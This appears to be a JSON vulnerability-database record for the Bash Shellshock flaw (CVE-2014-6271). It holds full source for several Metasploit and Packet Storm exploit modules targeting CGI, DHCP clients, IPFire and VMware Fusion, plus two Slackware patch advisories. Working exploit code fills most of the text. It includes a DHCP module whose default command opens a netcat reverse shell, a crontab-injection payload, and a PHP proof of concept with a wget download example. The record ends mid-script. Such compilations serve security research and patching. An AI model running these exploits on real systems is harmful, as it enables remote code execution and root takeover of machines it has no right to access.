execute_cmdstager(linemax: 500)\n handler\n end\n\n def send_command(username, cmd)\n cmd = \"() { :;}; #{datastore['RPATH']}/sh -c \\\"#{cmd}\\\"\"\n connect\n send_user(username)\n password_result = send_pass(cmd)\n disconnect\n password_result\n end\nend\n", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}, "sourceHref": "https://github.com/rapid7/metasploit-framework/blob/master/modules/exploits/multi/ftp/pureftpd_bash_env_exec.rb"}, {"lastseen": "2018-09-18T07:39:18", "bulletinFamily": "exploit", "description": "This module exploits the Shellshock vulnerability, a flaw in how the Bash shell handles external environment variables. This module targets dhclient by responding to DHCP requests with a malicious hostname, domainname, and URL which are then passed to the configuration scripts as environment variables, resulting in code execution. Due to length restrictions and the unusual networking scenario at the time of exploitation, this module achieves code execution by writing the payload into /etc/crontab and then cleaning it up after a session is created.", "modified": "2018-09-18T03:29:20", "published": "2014-09-26T06:24:42", "id": "MSF:EXPLOIT/UNIX/DHCP/BASH_ENVIRONMENT", "href": "", "type": "metasploit", "title": "Dhclient Bash Environment Variable Injection (Shellshock)", "sourceData": "##\n# This module requires Metasploit: https://metasploit.com/download\n# Current source: https://github.com/rapid7/metasploit-framework\n##\n\nrequire 'rex/proto/dhcp'\n\nclass MetasploitModule < Msf::Exploit::Remote\n Rank = ExcellentRanking\n\n include Msf::Exploit::Remote::DHCPServer\n\n def initialize(info = {})\n super(update_info(info,\n 'Name' => 'Dhclient Bash Environment Variable Injection (Shellshock)',\n 'Description' => %q|\n This module exploits the Shellshock vulnerability, a flaw in how the Bash shell\n handles external environment variables. This module targets dhclient by responding\n to DHCP requests with a malicious hostname, domainname, and URL which are then\n passed to the configuration scripts as environment variables, resulting in code\n execution. Due to length restrictions and the unusual networking scenario at the\n time of exploitation, this module achieves code execution by writing the payload\n into /etc/crontab and then cleaning it up after a session is created.\n |,\n 'Author' =>\n [\n 'Stephane Chazelas', # Vulnerability discovery\n 'egypt' # Metasploit module\n ],\n 'License' => MSF_LICENSE,\n 'Platform' => ['unix'],\n 'Arch' => ARCH_CMD,\n 'References' =>\n [\n [ 'CVE', '2014-6271' ],\n [ 'CWE', '94' ],\n [ 'OSVDB', '112004' ],\n [ 'EDB', '34765' ],\n [ 'URL', 'https://securityblog.redhat.com/2014/09/24/bash-specially-crafted-environment-variables-code-injection-attack/' ],\n [ 'URL', 'https://seclists.org/oss-sec/2014/q3/649' ],\n [ 'URL', 'https://www.trustedsec.com/september-2014/shellshock-dhcp-rce-proof-concept/' ]\n ],\n 'Payload' =>\n {\n # 255 for a domain name, minus some room for encoding\n 'Space' => 200,\n 'DisableNops' => true,\n 'Compat' =>\n {\n 'PayloadType' => 'cmd',\n 'RequiredCmd' => 'generic telnet ruby',\n }\n },\n 'Targets' => [ [ 'Automatic Target', { }] ],\n 'DefaultTarget' => 0,\n 'DisclosureDate' => 'Sep 24 2014',\n 'Notes' =>\n {\n 'AKA' => ['Shellshock']\n }\n ))\n\n deregister_options('DOMAINNAME', 'HOSTNAME', 'URL')\n end\n\n def on_new_session(session)\n print_status \"Cleaning up crontab\"\n # XXX this will brick a server some day\n session.shell_command_token(\"sed -i '/^\\\\* \\\\* \\\\* \\\\* \\\\* root/d' /etc/crontab\")\n end\n\n def exploit\n hash = datastore.copy\n # Quotes seem to be completely stripped, so other characters have to be\n # escaped\n p = payload.encoded.gsub(/([<>()|'&;$])/) { |s| Rex::Text.to_hex(s) }\n echo = \"echo -e #{(Rex::Text.to_hex(\"*\") + \" \") * 5}root #{p}>>/etc/crontab\"\n hash['DOMAINNAME'] = \"() { :; };#{echo}\"\n if hash['DOMAINNAME'].length > 255\n raise ArgumentError, 'payload too long'\n end\n\n hash['HOSTNAME'] = \"() { :; };#{echo}\"\n hash['URL'] = \"() { :; };#{echo}\"\n start_service(hash)\n\n begin\n while @dhcp.thread.alive?\n sleep 2\n end\n ensure\n stop_service\n end\n end\nend\n", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}, "sourceHref": "https://github.com/rapid7/metasploit-framework/blob/master/modules/exploits/unix/dhcp/bash_environment.rb"}, {"lastseen": "2019-02-12T10:43:46", "bulletinFamily": "exploit", "description": "IPFire, a free linux based open source firewall distribution, version <= 2.15 Update Core 82 contains an authenticated remote command execution vulnerability via shellshock in the request headers.", "modified": "2018-08-27T18:11:22", "published": "2016-05-30T00:40:12", "id": "MSF:EXPLOIT/LINUX/HTTP/IPFIRE_BASHBUG_EXEC", "href": "", "type": "metasploit", "title": "IPFire Bash Environment Variable Injection (Shellshock)", "sourceData": "##\n# This module requires Metasploit: https://metasploit.com/download\n# Current source: https://github.com/rapid7/metasploit-framework\n##\n\nclass MetasploitModule < Msf::Exploit::Remote\n include Msf::Exploit::Remote::HttpClient\n\n Rank = ExcellentRanking\n def initialize(info = {})\n super(\n update_info(\n info,\n 'Name' => 'IPFire Bash Environment Variable Injection (Shellshock)',\n 'Description' => %q(\n IPFire, a free linux based open source firewall distribution,\n version <= 2.15 Update Core 82 contains an authenticated remote\n command execution vulnerability via shellshock in the request headers.\n ),\n 'Author' =>\n [\n 'h00die <mike@stcyrsecurity.com>', # module\n 'Claudio Viviani' # discovery\n ],\n 'References' =>\n [\n [ 'EDB', '34839' ],\n [ 'CVE', '2014-6271']\n ],\n 'License' => MSF_LICENSE,\n 'Platform' => %w( linux unix ),\n 'Privileged' => false,\n 'DefaultOptions' =>\n {\n 'SSL' => true,\n 'PAYLOAD' => 'cmd/unix/generic'\n },\n 'Arch' => ARCH_CMD,\n 'Payload' =>\n {\n 'Compat' =>\n {\n 'PayloadType' => 'cmd',\n 'RequiredCmd' => 'generic'\n }\n },\n 'Targets' =>\n [\n [ 'Automatic Target', {}]\n ],\n 'DefaultTarget' => 0,\n 'DisclosureDate' => 'Sep 29 2014',\n 'Notes' =>\n {\n 'AKA' => ['Shellshock']\n }\n )\n )\n\n register_options(\n [\n OptString.new('USERNAME', [ true, 'User to login with', 'admin']),\n OptString.new('PASSWORD', [ false, 'Password to login with', '']),\n Opt::RPORT(444)\n ], self.class\n )\n end\n\n def check\n begin\n res = send_request_cgi(\n 'uri' => '/cgi-bin/index.cgi',\n 'method' => 'GET'\n )\n fail_with(Failure::UnexpectedReply, \"#{peer} - Could not connect to web service - no response\") if res.nil?\n fail_with(Failure::UnexpectedReply, \"#{peer} - Invalid credentials (response code: #{res.code})\") if res.code == 401\n /\\<strong\\>IPFire (?<version>[\\d.]{4}) \\([\\w]+\\) - Core Update (?<update>[\\d]+)/ =~ res.body\n\n if version && update && version == \"2.15\" && update.to_i < 83\n Exploit::CheckCode::Appears\n else\n Exploit::CheckCode::Safe\n end\n rescue ::Rex::ConnectionError\n fail_with(Failure::Unreachable, \"#{peer} - Could not connect to the web service\")\n end\n end\n\n #\n # CVE-2014-6271\n #\n def cve_2014_6271(cmd)\n %{() { :;}; /bin/bash -c \"#{cmd}\" }\n end\n\n def exploit\n begin\n payload = cve_2014_6271(datastore['CMD'])\n vprint_status(\"Exploiting with payload: #{payload}\")\n res = send_request_cgi(\n 'uri' => '/cgi-bin/index.cgi',\n 'method' => 'GET',\n 'headers' => { 'VULN' => payload }\n )\n\n fail_with(Failure::UnexpectedReply, \"#{peer} - Could not connect to web service - no response\") if res.nil?\n fail_with(Failure::UnexpectedReply, \"#{peer} - Invalid credentials (response code: #{res.code})\") if res.code == 401\n /<li>Device: \\/dev\\/(?<output>.+) reports/m =~ res.body\n print_good(output) unless output.nil?\n\n rescue ::Rex::ConnectionError\n fail_with(Failure::Unreachable, \"#{peer} - Could not connect to the web service\")\n end\n end\nend\n", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}, "sourceHref": "https://github.com/rapid7/metasploit-framework/blob/master/modules/exploits/linux/http/ipfire_bashbug_exec.rb"}, {"lastseen": "2019-02-21T05:40:33", "bulletinFamily": "exploit", "description": "This module exploits the Shellshock vulnerability, a flaw in how the Bash shell handles external environment variables. This module targets the VMWare Fusion application, allowing an unprivileged local user to get root access.", "modified": "2018-11-04T05:28:32", "published": "2014-09-24T22:44:14", "id": "MSF:EXPLOIT/OSX/LOCAL/VMWARE_BASH_FUNCTION_ROOT", "href": "", "type": "metasploit", "title": "OS X VMWare Fusion Privilege Escalation via Bash Environment Code Injection (Shellshock)", "sourceData": "##\n# This module requires Metasploit: https://metasploit.com/download\n# Current source: https://github.com/rapid7/metasploit-framework\n##\n\nclass MetasploitModule < Msf::Exploit::Local\n Rank = NormalRanking\n\n include Msf::Post::File\n include Msf::Post::OSX::Priv\n include Msf::Exploit::EXE\n include Msf::Exploit::FileDropper\n\n def initialize(info = {})\n super(update_info(info,\n 'Name' => 'OS X VMWare Fusion Privilege Escalation via Bash Environment Code Injection (Shellshock)',\n 'Description' => %q{\n This module exploits the Shellshock vulnerability, a flaw in how the Bash shell\n handles external environment variables. This module targets the VMWare Fusion\n application, allowing an unprivileged local user to get root access.\n },\n 'License' => MSF_LICENSE,\n 'Author' =>\n [\n 'Stephane Chazelas', # discovered the bash bug\n 'juken', # discovered the VMWare priv esc\n 'joev', # msf module\n 'mubix' # vmware-vmx-stats\n ],\n 'References' =>\n [\n [ 'CVE', '2014-6271' ],\n [ 'CWE', '94' ],\n [ 'OSVDB', '112004' ],\n [ 'EDB', '34765' ]\n ],\n 'Platform' => 'osx',\n 'Arch' => [ ARCH_X64 ],\n 'SessionTypes' => [ 'shell', 'meterpreter' ],\n 'Targets' => [\n [ 'Mac OS X 10.9 Mavericks x64 (Native Payload)',\n {\n 'Platform' => 'osx',\n 'Arch' => ARCH_X64\n }\n ]\n ],\n 'DefaultTarget' => 0,\n 'DisclosureDate' => 'Sep 24 2014',\n 'Notes' =>\n {\n 'AKA' => ['Shellshock']\n }\n ))\n\n register_options [\n OptString.new('VMWARE_PATH', [true, \"The path to VMware.app\", '/Applications/VMware Fusion.app']),\n ]\n register_advanced_options [\n OptString.new('WritableDir', [true, 'Writable directory', '/tmp'])\n ]\n end\n\n def base_dir\n datastore['WritableDir'].to_s\n end\n\n def upload(path, data)\n print_status \"Writing '#{path}' (#{data.size} bytes) ...\"\n write_file path, data\n register_file_for_cleanup path\n end\n\n def check\n check_str = Rex::Text.rand_text_alphanumeric(5)\n # ensure they are vulnerable to bash env variable bug\n if cmd_exec(\"env x='() { :;}; echo #{check_str}' bash -c echo\").include?(check_str) &&\n cmd_exec(\"file '#{datastore['VMWARE_PATH']}'\") !~ /cannot open/\n\n CheckCode::Vulnerable\n else\n CheckCode::Safe\n end\n end\n\n def exploit\n if is_root?\n fail_with Failure::BadConfig, 'Session already has root privileges'\n end\n\n if check != CheckCode::Vulnerable\n fail_with Failure::NotVulnerable, 'Target is not vulnerable'\n end\n\n unless writable? base_dir\n fail_with Failure::BadConfig, \"#{base_dir} is not writable\"\n end\n\n payload_file = \"#{base_dir}/.#{Rex::Text::rand_text_alpha_lower(8..12)}\"\n exe = Msf::Util::EXE.to_osx_x64_macho(framework, payload.encoded)\n upload payload_file, exe\n cmd_exec \"chmod +x #{payload_file}\"\n\n print_status 'Running VMWare services...'\n path = '/Contents/Library/vmware-vmx-stats' # path to the suid binary\n cmd_exec(\"LANG='() { :;}; #{payload_file}' '#{datastore['VMWARE_PATH']}#{path}' /dev/random\")\n end\nend\n", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}, "sourceHref": "https://github.com/rapid7/metasploit-framework/blob/master/modules/exploits/osx/local/vmware_bash_function_root.rb"}], "slackware": [{"lastseen": "2018-08-31T02:36:41", "bulletinFamily": "unix", "description": "New bash packages are available for Slackware 13.0, 13.1, 13.37, 14.0, 14.1,\nand -current to fix a security issue.\n\n\nHere are the details from the Slackware 14.1 ChangeLog:\n\npatches/packages/bash-4.2.048-i486-1_slack14.1.txz: Upgraded.\n This update fixes a vulnerability in bash related to how environment\n variables are processed: trailing code in function definitions was\n executed, independent of the variable name. In many common configurations\n (such as the use of CGI scripts), this vulnerability is exploitable over\n the network. Thanks to Stephane Chazelas for discovering this issue.\n For more information, see:\n http://seclists.org/oss-sec/2014/q3/650\n http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-6271\n (* Security fix *)\n\nWhere to find the new packages:\n\nThanks to the friendly folks at the OSU Open Source Lab\n(http://osuosl.org) for donating FTP and rsync hosting\nto the Slackware project! :-)\n\nAlso see the "Get Slack" section on http://slackware.com for\nadditional mirror sites near you.\n\nUpdated package for Slackware 13.0:\nftp://ftp.slackware.com/pub/slackware/slackware-13.0/patches/packages/bash-3.1.018-i486-1_slack13.0.txz\n\nUpdated package for Slackware x86_64 13.0:\nftp://ftp.slackware.com/pub/slackware/slackware64-13.0/patches/packages/bash-3.1.018-x86_64-1_slack13.0.txz\n\nUpdated package for Slackware 13.1:\nftp://ftp.slackware.com/pub/slackware/slackware-13.1/patches/packages/bash-4.1.012-i486-1_slack13.1.txz\n\nUpdated package for Slackware x86_64 13.1:\nftp://ftp.slackware.com/pub/slackware/slackware64-13.1/patches/packages/bash-4.1.012-x86_64-1_slack13.1.txz\n\nUpdated package for Slackware 13.37:\nftp://ftp.slackware.com/pub/slackware/slackware-13.37/patches/packages/bash-4.1.012-i486-1_slack13.37.txz\n\nUpdated package for Slackware x86_64 13.37:\nftp://ftp.slackware.com/pub/slackware/slackware64-13.37/patches/packages/bash-4.1.012-x86_64-1_slack13.37.txz\n\nUpdated package for Slackware 14.0:\nftp://ftp.slackware.com/pub/slackware/slackware-14.0/patches/packages/bash-4.2.048-i486-1_slack14.0.txz\n\nUpdated package for Slackware x86_64 14.0:\nftp://ftp.slackware.com/pub/slackware/slackware64-14.0/patches/packages/bash-4.2.048-x86_64-1_slack14.0.txz\n\nUpdated package for Slackware 14.1:\nftp://ftp.slackware.com/pub/slackware/slackware-14.1/patches/packages/bash-4.2.048-i486-1_slack14.1.txz\n\nUpdated package for Slackware x86_64 14.1:\nftp://ftp.slackware.com/pub/slackware/slackware64-14.1/patches/packages/bash-4.2.048-x86_64-1_slack14.1.txz\n\nUpdated package for Slackware -current:\nftp://ftp.slackware.com/pub/slackware/slackware-current/slackware/a/bash-4.3.025-i486-1.txz\n\nUpdated package for Slackware x86_64 -current:\nftp://ftp.slackware.com/pub/slackware/slackware64-current/slackware64/a/bash-4.3.025-x86_64-1.txz\n\n\nMD5 signatures:\n\nSlackware 13.0 package:\n0f1b811376d3d2c5361f3454622a362e bash-3.1.018-i486-1_slack13.0.txz\n\nSlackware x86_64 13.0 package:\n9d727bed3e447a3b12055101982f7fc7 bash-3.1.018-x86_64-1_slack13.0.txz\n\nSlackware 13.1 package:\nf9da6c83129abec534a8e0425f0bbdde bash-4.1.012-i486-1_slack13.1.txz\n\nSlackware x86_64 13.1 package:\nf1bbea2829c3b800dc401ba911d47b61 bash-4.1.012-x86_64-1_slack13.1.txz\n\nSlackware 13.37 package:\nd8eb30ddaa6c5c227a9263702fd81eae bash-4.1.012-i486-1_slack13.37.txz\n\nSlackware x86_64 13.37 package:\n3854601f9152bc780730c48dd686ef27 bash-4.1.012-x86_64-1_slack13.37.txz\n\nSlackware 14.0 package:\nd01b294288a5f8ead15f0cf160bb38bd bash-4.2.048-i486-1_slack14.0.txz\n\nSlackware x86_64 14.0 package:\n324cc2cdedff1b8d6a355e013c42d5b1 bash-4.2.048-x86_64-1_slack14.0.txz\n\nSlackware 14.1 package:\nf7f18cd323b727fac2e6bbf9cab8213b bash-4.2.048-i486-1_slack14.1.txz\n\nSlackware x86_64 14.1 package:\n0dee161f7eede16fe5d9394bd231bfd7 bash-4.2.048-x86_64-1_slack14.1.txz\n\nSlackware -current package:\nd9bcc4828e311bc901b47f3460421f75 a/bash-4.3.025-i486-1.txz\n\nSlackware x86_64 -current package:\nc7bc5ec4b3e9ac3022ad6a718ae19d7b a/bash-4.3.025-x86_64-1.txz\n\n\nInstallation instructions:\n\nUpgrade the package as root:\n > upgradepkg bash-4.2.048-i486-1_slack14.1.txz", "modified": "2014-09-24T16:37:00", "published": "2014-09-24T16:37:00", "id": "SSA-2014-267-01", "href": "http://www.slackware.com/security/viewer.php?l=slackware-security&y=2014&m=slackware-security.522193", "title": "bash", "type": "slackware", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2018-08-31T00:36:48", "bulletinFamily": "unix", "description": "New bash packages are available for Slackware 13.0, 13.1, 13.37, 14.0, 14.1,\nand -current to fix a security issue.\n\n\nHere are the details from the Slackware 14.1 ChangeLog:\n\npatches/packages/bash-4.2.050-i486-1_slack14.1.txz: Upgraded.\n Another bash update. Here's some information included with the patch:\n "This patch changes the encoding bash uses for exported functions to avoid\n clashes with shell variables and to avoid depending only on an environment\n variable's contents to determine whether or not to interpret it as a shell\n function."\n After this update, an environment variable will not go through the parser\n unless it follows this naming structure: BASH_FUNC_*%%\n Most scripts never expected to import functions from environment variables,\n so this change (although not backwards compatible) is not likely to break\n many existing scripts. It will, however, close off access to the parser as\n an attack surface in the vast majority of cases. There's already another\n vulnerability similar to CVE-2014-6271 for which there is not yet a fix,\n but this hardening patch prevents it (and likely many more similar ones).\n Thanks to Florian Weimer and Chet Ramey.\n (* Security fix *)\n\nWhere to find the new packages:\n\nThanks to the friendly folks at the OSU Open Source Lab\n(http://osuosl.org) for donating FTP and rsync hosting\nto the Slackware project! :-)\n\nAlso see the "Get Slack" section on http://slackware.com for\nadditional mirror sites near you.\n\nUpdated package for Slackware 13.0:\nftp://ftp.slackware.com/pub/slackware/slackware-13.0/patches/packages/bash-3.1.020-i486-1_slack13.0.txz\n\nUpdated package for Slackware x86_64 13.0:\nftp://ftp.slackware.com/pub/slackware/slackware64-13.0/patches/packages/bash-3.1.020-x86_64-1_slack13.0.txz\n\nUpdated package for Slackware 13.1:\nftp://ftp.slackware.com/pub/slackware/slackware-13.1/patches/packages/bash-4.1.014-i486-1_slack13.1.txz\n\nUpdated package for Slackware x86_64 13.1:\nftp://ftp.slackware.com/pub/slackware/slackware64-13.1/patches/packages/bash-4.1.014-x86_64-1_slack13.1.txz\n\nUpdated package for Slackware 13.37:\nftp://ftp.slackware.com/pub/slackware/slackware-13.37/patches/packages/bash-4.1.014-i486-1_slack13.37.txz\n\nUpdated package for Slackware x86_64 13.37:\nftp://ftp.slackware.com/pub/slackware/slackware64-13.37/patches/packages/bash-4.1.014-x86_64-1_slack13.37.txz\n\nUpdated package for Slackware 14.0:\nftp://ftp.slackware.com/pub/slackware/slackware-14.0/patches/packages/bash-4.2.050-i486-1_slack14.0.txz\n\nUpdated package for Slackware x86_64 14.0:\nftp://ftp.slackware.com/pub/slackware/slackware64-14.0/patches/packages/bash-4.2.050-x86_64-1_slack14.0.txz\n\nUpdated package for Slackware 14.1:\nftp://ftp.slackware.com/pub/slackware/slackware-14.1/patches/packages/bash-4.2.050-i486-1_slack14.1.txz\n\nUpdated package for Slackware x86_64 14.1:\nftp://ftp.slackware.com/pub/slackware/slackware64-14.1/patches/packages/bash-4.2.050-x86_64-1_slack14.1.txz\n\nUpdated package for Slackware -current:\nftp://ftp.slackware.com/pub/slackware/slackware-current/slackware/a/bash-4.3.027-i486-1.txz\n\nUpdated package for Slackware x86_64 -current:\nftp://ftp.slackware.com/pub/slackware/slackware64-current/slackware64/a/bash-4.3.027-x86_64-1.txz\n\n\nMD5 signatures:\n\nSlackware 13.0 package:\n8b5f50012f3c7b18474d7cf19f2be2bb bash-3.1.020-i486-1_slack13.0.txz\n\nSlackware x86_64 13.0 package:\n3cbe8607bf2209e694320f6416f1cd04 bash-3.1.020-x86_64-1_slack13.0.txz\n\nSlackware 13.1 package:\nc674f9b681c144c32aba0923303d789b bash-4.1.014-i486-1_slack13.1.txz\n\nSlackware x86_64 13.1 package:\n223fc7505cd2dedd99b79d7f510e749c bash-4.1.014-x86_64-1_slack13.1.txz\n\nSlackware 13.37 package:\n4b4e4df9e4e949637a641a94aab35765 bash-4.1.014-i486-1_slack13.37.txz\n\nSlackware x86_64 13.37 package:\n35f35367efd279d2001de989f366b972 bash-4.1.014-x86_64-1_slack13.37.txz\n\nSlackware 14.0 package:\n19cb9e04683c9020417490047f20b40d bash-4.2.050-i486-1_slack14.0.txz\n\nSlackware x86_64 14.0 package:\n10bc930d1dd85cf3446f454b129e2bc7 bash-4.2.050-x86_64-1_slack14.0.txz\n\nSlackware 14.1 package:\n1d1f8137b674813bf7f070b66ad713b1 bash-4.2.050-i486-1_slack14.1.txz\n\nSlackware x86_64 14.1 package:\ne80cc985c6112aea20d0ba0eb2821d03 bash-4.2.050-x86_64-1_slack14.1.txz\n\nSlackware -current package:\n175685f32cfa87da1c9d7cdfb42786c5 a/bash-4.3.027-i486-1.txz\n\nSlackware x86_64 -current package:\n34a83642b058fa40e6f441c6161e2208 a/bash-4.3.027-x86_64-1.txz\n\n\nInstallation instructions:\n\nUpgrade the package as root:\n > upgradepkg bash-4.2.050-i486-1_slack14.1.txz", "modified": "2014-09-29T12:33:36", "published": "2014-09-29T12:33:36", "id": "SSA-2014-272-01", "href": "http://www.slackware.com/security/viewer.php?l=slackware-security&y=2014&m=slackware-security.559646", "title": "bash", "type": "slackware", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}], "packetstorm": [{"lastseen": "2016-12-05T22:24:25", "bulletinFamily": "exploit", "description": "", "modified": "2014-09-25T00:00:00", "published": "2014-09-25T00:00:00", "href": "https://packetstormsecurity.com/files/128418/bashedCgi-Remote-Command-Execution.html", "id": "PACKETSTORM:128418", "type": "packetstorm", "title": "bashedCgi Remote Command Execution", "sourceData": "` require 'msf/core' \n \nclass Metasploit3 < Msf::Auxiliary \n \ninclude Msf::Exploit::Remote::HttpClient \n \n \ndef initialize(info = {}) \nsuper(update_info(info, \n'Name' => 'bashedCgi', \n'Description' => %q{ \nQuick & dirty module to send the BASH exploit payload (CVE-2014-6271) to CGI scripts that are BASH-based or invoke BASH, to execute an arbitrary shell command. \n}, \n'Author' => [ 'Stephane Chazelas' ], # vuln discovery \n'Author' => [ 'Shaun Colley <scolley at ioactive.com>' ], # metasploit module \n'License' => MSF_LICENSE, \n'References' => [ 'CVE', '2014-6271' ], \n'Targets' => \n[ \n[ 'cgi', {} ] \n], \n'DefaultTarget' => 0, \n'Payload' => \n{ \n'Space' => 1024, \n'DisableNops' => true \n}, \n'DefaultOptions' => { 'PAYLOAD' => 0 } \n)) \n \nregister_options( \n[ \nOptString.new('TARGETURI', [true, 'Absolute path of BASH-based CGI', '/']), \nOptString.new('CMD', [true, 'Command to execute', '/usr/bin/touch /tmp/metasploit']) \n], self.class) \nend \n \ndef run \nres = send_request_cgi({ \n'method' => 'GET', \n'uri' => datastore['TARGETURI'], \n'agent' => \"() { :;}; \" + datastore['CMD'] \n}) \n \nif res && res.code == 200 \nprint_good(\"Command sent - 200 received\") \nelse \nprint_error(\"Command sent - non-200 reponse\") \nend \nend \nend \n`\n", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}, "sourceHref": "https://packetstormsecurity.com/files/download/128418/bashedCgi.rb.txt"}, {"lastseen": "2016-12-05T22:21:42", "bulletinFamily": "exploit", "description": "", "modified": "2014-09-26T00:00:00", "published": "2014-09-26T00:00:00", "href": "https://packetstormsecurity.com/files/128444/DHCP-Client-Bash-Environment-Variable-Code-Injection.html", "id": "PACKETSTORM:128444", "type": "packetstorm", "title": "DHCP Client Bash Environment Variable Code Injection", "sourceData": "`## \n# This module requires Metasploit: http//metasploit.com/download \n# Current source: https://github.com/rapid7/metasploit-framework \n## \n \nrequire 'msf/core' \nrequire 'rex/proto/dhcp' \n \nclass Metasploit3 < Msf::Auxiliary \n \ninclude Msf::Exploit::Remote::DHCPServer \n \ndef initialize \nsuper( \n'Name' => 'DHCP Client Bash Environment Variable Code Injection', \n'Description' => %q{ \nThis module exploits a code injection in specially crafted environment \nvariables in Bash, specifically targeting dhclient network configuration \nscripts through the HOSTNAME, DOMAINNAME, and URL DHCP options. \n}, \n'Author' => \n[ \n'scriptjunkie', 'apconole[at]yahoo.com', # Original DHCP Server auxiliary module \n'Stephane Chazelas', # Vulnerability discovery \n'Ramon de C Valle' # This module \n], \n'License' => MSF_LICENSE, \n'Actions' => \n[ \n[ 'Service' ] \n], \n'PassiveActions' => \n[ \n'Service' \n], \n'DefaultAction' => 'Service', \n'References' => [ \n['CVE', '2014-6271'], \n['CWE', '94'], \n['URL', 'https://securityblog.redhat.com/2014/09/24/bash-specially-crafted-environment-variables-code-injection-attack/'], \n['URL', 'http://seclists.org/oss-sec/2014/q3/649',], \n['URL', 'https://www.trustedsec.com/september-2014/shellshock-dhcp-rce-proof-concept/',] \n], \n'DisclosureDate' => 'Sep 24 2014' \n) \n \nregister_options( \n[ \nOptString.new('SRVHOST', [ true, 'The IP of the DHCP server' ]), \nOptString.new('NETMASK', [ true, 'The netmask of the local subnet' ]), \nOptString.new('DHCPIPSTART', [ false, 'The first IP to give out' ]), \nOptString.new('DHCPIPEND', [ false, 'The last IP to give out' ]), \nOptString.new('ROUTER', [ false, 'The router IP address' ]), \nOptString.new('BROADCAST', [ false, 'The broadcast address to send to' ]), \nOptString.new('DNSSERVER', [ false, 'The DNS server IP address' ]), \n# OptString.new('HOSTNAME', [ false, 'The optional hostname to assign' ]), \nOptString.new('HOSTSTART', [ false, 'The optional host integer counter' ]), \nOptString.new('FILENAME', [ false, 'The optional filename of a tftp boot server' ]), \nOptString.new('CMD', [ true, 'The command to run', '/bin/nc -e /bin/sh 127.0.0.1 4444']) \n], self.class) \nend \n \ndef run \nvalue = \"() { :; }; PATH=/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin #{datastore['CMD']}\" \n \n# This loop is required because the current DHCP Server exits after the \n# first interaction. \nloop do \nbegin \nstart_service({ \n'HOSTNAME' => value, \n'DOMAINNAME' => value, \n'URL' => value \n}.merge(datastore)) \n \nwhile dhcp.thread.alive? \nselect(nil, nil, nil, 2) \nend \n \nrescue Interrupt \nbreak \n \nensure \nstop_service \nend \nend \nend \n \nend \n`\n", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}, "sourceHref": "https://packetstormsecurity.com/files/download/128444/dhclient_bash_env.rb.txt"}, {"lastseen": "2016-12-05T22:23:24", "bulletinFamily": "exploit", "description": "", "modified": "2014-09-25T00:00:00", "published": "2014-09-25T00:00:00", "href": "https://packetstormsecurity.com/files/128394/Bash-Code-Injection-Proof-Of-Concept.html", "id": "PACKETSTORM:128394", "type": "packetstorm", "title": "Bash Code Injection Proof Of Concept", "sourceData": "`<?php \n/* \nTitle: Bash Specially-crafted Environment Variables Code Injection Vulnerability \nCVE: 2014-6271 \nVendor Homepage: https://www.gnu.org/software/bash/ \nAuthor: Prakhar Prasad && Subho Halder \nAuthor Homepage: https://prakharprasad.com && https://appknox.com \nDate: September 25th 2014 \nTested on: Mac OS X 10.9.4/10.9.5 with Apache/2.2.26 \nGNU bash, version 3.2.51(1)-release (x86_64-apple-darwin13) \nUsage: php bash.php -u http://<hostname>/cgi-bin/<cgi> -c cmd \nEg. php bash.php -u http://localhost/cgi-bin/hello -c \"wget http://appknox.com -O /tmp/shit\" \nReference: https://www.reddit.com/r/netsec/comments/2hbxtc/cve20146271_remote_code_execution_through_bash/ \n \nTest CGI Code : #!/bin/bash \necho \"Content-type: text/html\" \necho \"\" \necho \"Bash-is-Vulnerable\" \n \n*/ \nerror_reporting(0); \nif(!defined('STDIN')) die(\"Please run it through command-line!\\n\"); \n$x = getopt(\"u:c:\"); \nif(!isset($x['u']) || !isset($x['c'])) \n{ \ndie(\"Usage: \".$_SERVER['PHP_SELF'].\" -u URL -c cmd\\n\"); \n \n} \n$url = $x['u']; \n$cmd = $x['c']; \n \n$context = stream_context_create( \narray( \n'http' => array( \n'method' => 'GET', \n'header' => 'User-Agent: () { :;}; /bin/bash -c \"'.$cmd.'\"' \n) \n) \n); \n \nif(!file_get_contents($url, false, $context) && strpos($http_response_header[0],\"500\") > 0) \ndie(\"Command sent to the server!\\n\"); \nelse \ndie(\"Connection Error\\n\"); \n?> \n`\n", "sourceHref": "https://packetstormsecurity.com/files/download/128394/bash-poc.txt", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2016-12-20T02:03:32", "bulletinFamily": "exploit", "description": "", "modified": "2016-12-19T00:00:00", "published": "2016-12-19T00:00:00", "href": "https://packetstormsecurity.com/files/140205/RSSMON-BEAM-Red-Star-OS-3.0-Shellshock.html", "id": "PACKETSTORM:140205", "title": "RSSMON / BEAM (Red Star OS 3.0) Shellshock", "type": "packetstorm", "sourceData": "`#!/usr/bin/env python \n# RedStar OS 3.0 Server (BEAM & RSSMON) shellshock exploit \n# ======================================================== \n# BEAM & RSSMON are Webmin based configuration utilities \n# that ship with RSS server 3.0. These packages are the \n# recommended GUI configuration components and listen on \n# a user specified port from 10000/tcp to 65535/tcp. They \n# are accessible on the local host only in vanilla install \n# unless the firewall is disabled. Both services run with \n# full root permissions and can be exploited for LPE or \n# network attacks. RSSMON has hardened SELinux policies \n# applied which hinder exploitation of this vulnerability \n# be limiting access to network resources. Commands are \n# still run as root in a blind way. 